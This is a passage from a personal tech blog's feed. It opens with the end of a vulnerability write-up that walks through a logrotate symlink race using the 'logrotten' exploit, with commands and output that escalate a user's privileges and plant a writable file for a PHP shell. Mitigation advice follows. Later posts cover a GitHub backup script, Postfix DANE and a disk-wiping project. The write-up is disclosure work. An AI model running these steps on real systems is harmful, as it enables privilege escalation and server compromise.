style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">28</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span> </pre></div></pre> <p>Only root can write the logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">28</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>User www-data can manipulate the path above the log directory:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">3</span> www-data root <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">26</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project </pre></div></pre> <p>Logrotate configuration having the “create” directive:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log <span style="color: #7a0874; font-weight: bold;">{</span> daily rotate <span style="color: #000000;">12</span> missingok notifempty <span style="color: #c20cb9; font-weight: bold;">size</span> 1k create <span style="color: #7a0874; font-weight: bold;">}</span></pre></div></pre> <p>www-data is allowed to rename the directory /var/www/project/html:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #c20cb9; font-weight: bold;">mv</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html2 </pre></div></pre> <p>www-data can create a new logdir and it will have write permissions for www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir </pre></div></pre> <p>www-data can write into the new logfile:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">"hello world"</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p>Permissions of /var/www/project/html/logdir/file.log:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> www-data www-data <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">31</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <p> </p> <p>User www-data executes the exploit and waits until logrotate will be started by cron:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">www-data<span style="color: #000000; font-weight: bold;">@</span>localhost$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>file.log... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>project<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>logdir2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>The new file was created in /etc/bash_completion.de with owner www-data:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> www-data www-data <span style="color: #000000;">0</span> Apr <span style="color: #000000;">30</span> <span style="color: #000000;">17</span>:<span style="color: #000000;">35</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>file.log </pre></div></pre> <h3>4) Logrotate runs as low privileged user having the “su”-directive set. The path to the log directory is in control of a user of a group.</h3> <p>Using the “su”-directive is not save per se. It prevents attackers from getting root privileges, but it is still possible to gain the privileges of another user.</p> <p>Directories of /var/www are owned by www-data. Only logdirs is writeable by members of the group “loggrp”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">drwxr-xr-x <span style="color: #000000;">2</span> www-data www-data <span style="color: #000000;">4096</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">21</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html drwxrwxr-x <span style="color: #000000;">3</span> www-data loggrp <span style="color: #000000;">4096</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">24</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs</pre></div></pre> <p>The users www-data and myserv are members of the group loggrp:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  loggrp:x:<span style="color: #000000;">1001</span>:www-data,myserv </pre></div></pre> <p>Logrotate is configured with the “su”-directive. It will rotate logs with the privileges of www-data instead of root. The target /var/www/logdirs/example.com/* makes sure that all files inside the log directory will be rotated:</p> <pre> <code> /var/www/logdirs/example.com/* { daily rotate 12 missingok notifempty size 1k create www-data loggrp su www-data loggrp } </code></pre> <p>User “myserv” executes the exploit with the target directory “/var/www/html”:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #666666;">myserv@localhost$ </span>.<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-t</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com<span style="color: #000000; font-weight: bold;">/</span>shell.php Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com<span style="color: #000000; font-weight: bold;">/</span>shell.php... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>logdirs<span style="color: #000000; font-weight: bold;">/</span>example.com2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html Done<span style="color: #000000; font-weight: bold;">!</span></pre></div></pre> <p>User “myserv” is now able to write any php-shell into the new created file:</p> <p> </p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">  <span style="color: #660033;">-rw-rw-r--</span> <span style="color: #000000;">1</span> www-data loggrp <span style="color: #000000;">0</span> May <span style="color: #000000;">1</span> 05:<span style="color: #000000;">47</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>www<span style="color: #000000; font-weight: bold;">/</span>html<span style="color: #000000; font-weight: bold;">/</span>shell.php </pre></div></pre> <h2>Mitigation</h2> <p>This vulnerability occurs if log files are rotated in insecure directories. Even though the “su”-directive of logrotate can prevent an attacker from becoming root, it still leaves the opportunity open to escalate to another system user(as shown in example 4).</p> <p>One way to mitigate the problem is using Apparmor or SElinux.</p> <h2>Fix</h2> <p>Vulnerable setups can be easily fixed by making sure that the path to the log directory can only be manipulated by root or the owner of the log directory. However, a vulnerable setup is not always obvious. Therefore logrotate should check the complete path to the log directory. If one element of the path is not secure logrotate has to abort with an error. Algorithms for checking a directory path could be found on the following pages:</p> <ul><li> <p><a href="http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf">http://research.cs.wisc.edu/mist/safefile/safeopen_ares2008.pdf</a></p> </li> <li> <p><a href="https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory">https://wiki.sei.cmu.edu/confluence/display/c/FIO15-C.+Ensure+that+file+operations+are+performed+in+a+secure+directory</a></p> </li> </ul><p>Deploying such a fix might have a huge impact. If it would be deployed at large scale it could break existing installations because it prevents logrotate from rotating in insecure setups.</p> <h2>Conclusion</h2> <p>Logrotate is widely used for rotating logfiles. As the examples above have shown, insecure configurations are not always obvious. Even though a fix could prevent privilege escalations, it might also stop logrotate from working in insecure setups.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 01 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=276&amp;2=comment&amp;3=comment" token="nAADQ8ixeyZnHqkBiPI1IjBgknj5s0ksfUzPqHOr45A"></drupal-render-placeholder> </section> Wed, 01 May 2019 11:04:35 +0000 Hoti 276 at https://tech.feedyourhead.at Now is a good time to backup our github-repos https://tech.feedyourhead.at/content/now-is-a-good-time-to-backup-our-github-repos <span class="field field--name-title field--type-string field--label-hidden">Now is a good time to backup our github-repos</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Many people are scared because <a href="https://news.microsoft.com/2018/06/04/microsoft-to-acquire-github-for-7-5-billion/">Microsoft bought GitHub</a>. I wonder why people are so shocked now. Github is just another cloud-thingy and cloud means: "it's just the computer of someone else". If "someone else" will shutdown or wipe his computer, then we better have backups. Having this in our minds I would say that it's time to make (auto)backups. I wrote this little ruby-script that clones all public repositories of a user into a directory. If the repositories already exist locally, then this script will just make a "git-pull".</p> <div class="geshifilter"><pre class="ruby geshifilter-ruby" style="font-family:monospace;"><span style="color:#008000; font-style:italic;">#!/usr/bin/env ruby</span> &nbsp; <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'net/http'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'json'</span> <span style="color:#CC0066; font-weight:bold;">require</span> <span style="color:#996600;">'fileutils'</span> &nbsp; directory = <span style="color:#996600;">&quot;./&quot;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">def</span> help warn <span style="color:#996600;">&quot;usage: #{$PROGRAM_NAME} &lt;github-user&gt; [ &lt;dst-directory&gt; ]&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#008000; font-style:italic;"># got this function from stackoverflow.com: </span> <span style="color:#008000; font-style:italic;"># stackoverflow.com/questions/2108727/which-in-ruby-checking-if-program-exists-in-path-from-ruby</span> <span style="color:#9966CC; font-weight:bold;">def</span> which<span style="color:#006600; font-weight:bold;">&#40;</span>cmd<span style="color:#006600; font-weight:bold;">&#41;</span> exts = ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span> ? ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATHEXT'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">';'</span><span style="color:#006600; font-weight:bold;">&#41;</span> : <span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">''</span><span style="color:#006600; font-weight:bold;">&#93;</span> ENV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#996600;">'PATH'</span><span style="color:#006600; font-weight:bold;">&#93;</span>.<span style="color:#CC0066; font-weight:bold;">split</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#CC00FF; font-weight:bold;">File</span>::PATH_SEPARATOR<span style="color:#006600; font-weight:bold;">&#41;</span>.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span>path<span style="color:#006600; font-weight:bold;">|</span> exts.<span style="color:#9900CC;">each</span> <span style="color:#006600; font-weight:bold;">&#123;</span> <span style="color:#006600; font-weight:bold;">|</span>ext<span style="color:#006600; font-weight:bold;">|</span> exe = <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">join</span><span style="color:#006600; font-weight:bold;">&#40;</span>path, <span style="color:#996600;">&quot;#{cmd}#{ext}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#0000FF; font-weight:bold;">return</span> exe <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">executable</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&amp;&amp;</span> !<span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>exe<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#006600; font-weight:bold;">&#125;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#0000FF; font-weight:bold;">return</span> <span style="color:#0000FF; font-weight:bold;">nil</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gitbin = which<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;git&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> gitbin.<span style="color:#0000FF; font-weight:bold;">nil</span>? warn <span style="color:#996600;">&quot;git-binary not found&quot;</span> <span style="color:#CC0066; font-weight:bold;">exit</span> <span style="color:#006666;">1</span> <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&lt;</span> <span style="color:#006666;">1</span> <span style="color:#006600; font-weight:bold;">||</span> ARGV.<span style="color:#9900CC;">length</span> <span style="color:#006600; font-weight:bold;">&gt;</span> <span style="color:#006666;">2</span> help <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; gituser = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">0</span><span style="color:#006600; font-weight:bold;">&#93;</span> directory = ARGV<span style="color:#006600; font-weight:bold;">&#91;</span><span style="color:#006666;">1</span><span style="color:#006600; font-weight:bold;">&#93;</span> <span style="color:#9966CC; font-weight:bold;">if</span> ARGV.<span style="color:#9900CC;">length</span> == <span style="color:#006666;">2</span> &nbsp; <span style="color:#9966CC; font-weight:bold;">unless</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span>directory<span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC00FF; font-weight:bold;">FileUtils</span>::mkdir_p directory <span style="color:#9966CC; font-weight:bold;">end</span> &nbsp; uri = <span style="color:#CC00FF; font-weight:bold;">URI</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;https://api.github.com/users/#{gituser}/repos&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; resp = <span style="color:#6666ff; font-weight:bold;">Net::HTTP</span>.<span style="color:#9900CC;">get</span><span style="color:#006600; font-weight:bold;">&#40;</span>uri<span style="color:#006600; font-weight:bold;">&#41;</span> parsed = JSON.<span style="color:#9900CC;">parse</span><span style="color:#006600; font-weight:bold;">&#40;</span>resp<span style="color:#006600; font-weight:bold;">&#41;</span> &nbsp; parsed.<span style="color:#9900CC;">each</span> <span style="color:#9966CC; font-weight:bold;">do</span> <span style="color:#006600; font-weight:bold;">|</span><span style="color:#CC0066; font-weight:bold;">p</span><span style="color:#006600; font-weight:bold;">|</span> <span style="color:#9966CC; font-weight:bold;">if</span> <span style="color:#CC00FF; font-weight:bold;">File</span>.<span style="color:#9900CC;">directory</span>?<span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;cd #{directory}/#{p['name']} &amp;&amp; #{gitbin} pull&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">else</span> <span style="color:#CC0066; font-weight:bold;">system</span><span style="color:#006600; font-weight:bold;">&#40;</span><span style="color:#996600;">&quot;#{gitbin} clone https://github.com/#{p['full_name']} #{directory}/#{p['name']}&quot;</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#9966CC; font-weight:bold;">end</span> <span style="color:#9966CC; font-weight:bold;">end</span></pre></div> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jun 07 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/103" hreflang="en">Open-Source</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/backup" hreflang="en">Backup</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/shell" hreflang="en">Shell</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=267&amp;2=comment&amp;3=comment" token="oPcbvqzYUcugBxbk0j0w2JLHdMWOfeGFn5WU98XCfbI"></drupal-render-placeholder> </section> Thu, 07 Jun 2018 10:41:24 +0000 Hoti 267 at https://tech.feedyourhead.at Postfix: verified TLS with DANE https://tech.feedyourhead.at/content/postfix-verified-tls-with-dane <span class="field field--name-title field--type-string field--label-hidden">Postfix: verified TLS with DANE</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>TLS via SMTP is <a href="https://en.wikipedia.org/wiki/Opportunistic_TLS">opportunistic</a> which makes connections vulnerable to man-in-the-middle-attacks. In order to prevent mitm-attacks, <a href="https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities">DANE</a> could be used. The sender-server will first check the domain-records if dnssec is in use(and valid) and if a TLSA-record is published(and valid). If a TLSA-record is valid and matches with the certificate of the recipient-server the connection could be encrypted and the encryption is verified. Postfix was one of the first smtp-servers that implemented DANE since the <a href="https://tools.ietf.org/id/draft-dukhovni-smtp-opportunistic-tls-00.html">author of the DANE protocol is a postfix-developer</a>. This article describes how to enable DANE in postfix.</p> <h3>Preconditions</h3> <p>It's very easy to enable DANE in postfix. First we have to ensure that postfix can resolve DNSsec queries. I recommend to install the dns-resolver "<a href="https://unbound.net/">unbound</a>" on the postfix-server. Unbound does DNSsec pretty well. It also automatically manages the trust-anchors for DNSsec. We can check if DNSsec works, if the "ad"-flag is set. So lets use dig to test it:</p> <pre> <code>&gt; DiG 9.9.5-9+deb8u15-Debian &lt;&lt;&gt;&gt; gov. +dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 35764 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4096 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As we can see, the "ad"-flag was set. If we use a resolver without dnssec-support it would look like that:</p> <pre> <code> % dig gov. +dnssec ; &lt;&lt;&gt;&gt; DiG 9.8.4-rpz2+rl005.12-P1 &lt;&lt;&gt;&gt; gov. +dnssec ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 25074 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags: do; udp: 4000 ;; QUESTION SECTION: ;gov. IN A </code></pre> <p>As you can see, there is no "ad"-flag in this example. That indicates that DNSsec is not supported by the resolver.</p> <h3>Postfix-config</h3> <p>As soon as we set up a resolver with dnssec-support, we can easily enable DANE in postfix:</p> <pre> <code> # DANE-Settings smtp_dns_support_level=dnssec smtp_host_lookup=dns smtp_tls_security_level = dane smtp_tls_loglevel=1 </code></pre> <p>Now postfix will always try to verify the TLS-connection using DANE. If you just want to enable DANE for specific domains, I'll recommend have a look at the <a href="http://www.postfix.org/TLS_README.html#client_tls">example in the postfix-documentation</a>.</p> <h3>Test</h3> <p>We can test DANE by sending Emails to a server that has TLSA-Records. There is a list of domains with TLSA-records at the end of <a href="https://static.ptbl.co/static/attachments/169319/1520904692.pdf?1520904692">this pdf</a>. I just tested DANE by sending an email to a gmx.net-address:</p> <pre> <code> May 12 21:26:59 mymailserver postfix/smtp[3064]: Verified TLS connection established to mx01.emig.gmx.net[212.227.17.5]:25: TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits) </code></pre> <p>The keyword "Verified" indicates that the TLS-connection could be verified.</p> <p>&nbsp;</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 14 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/crypto" hreflang="en">Crypto</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/email" hreflang="en">Email</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/mail" hreflang="en">Mail</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=265&amp;2=comment&amp;3=comment" token="oDTTj6SHpFvGYUI319oXvKTZNvcKlQalAHTJrUNU044"></drupal-render-placeholder> </section> Mon, 14 May 2018 12:11:10 +0000 Hoti 265 at https://tech.feedyourhead.at statx-fun got popular https://tech.feedyourhead.at/content/statx-fun-got-popular <span class="field field--name-title field--type-string field--label-hidden">statx-fun got popular</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I am very surprised that <a href="https://tech.feedyourhead.at/content/using-the-new-statx-system-call">statx-fun</a> got one of my most popular <a href="https://github.com/whotwagner/statx-fun">git repositories</a>.  Arkadiusz Miśkiewicz even created a  <a href="https://git.pld-linux.org/gitweb.cgi?p=packages/statx-fun.git;a=summary">PLD-Linux-package</a> for it. I didn't expect that.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 06 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=263&amp;2=comment&amp;3=comment" token="PbpWFLuU4ui5s5hKfouSBmi_2Kp88yfmwXrVzp8wz74"></drupal-render-placeholder> </section> Sun, 06 May 2018 11:24:36 +0000 Hoti 263 at https://tech.feedyourhead.at HackADay: Let's make a Nukestation https://tech.feedyourhead.at/content/hackaday-lets-make-a-nukestation <span class="field field--name-title field--type-string field--label-hidden">HackADay: Let&#039;s make a Nukestation</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Every time I replace an old hard disk by a newer or bigger one I think that I'll wipe it later. Now I have a big amount of hard disks to wipe. Since wiping takes ages, I don't want to use my personal computer for 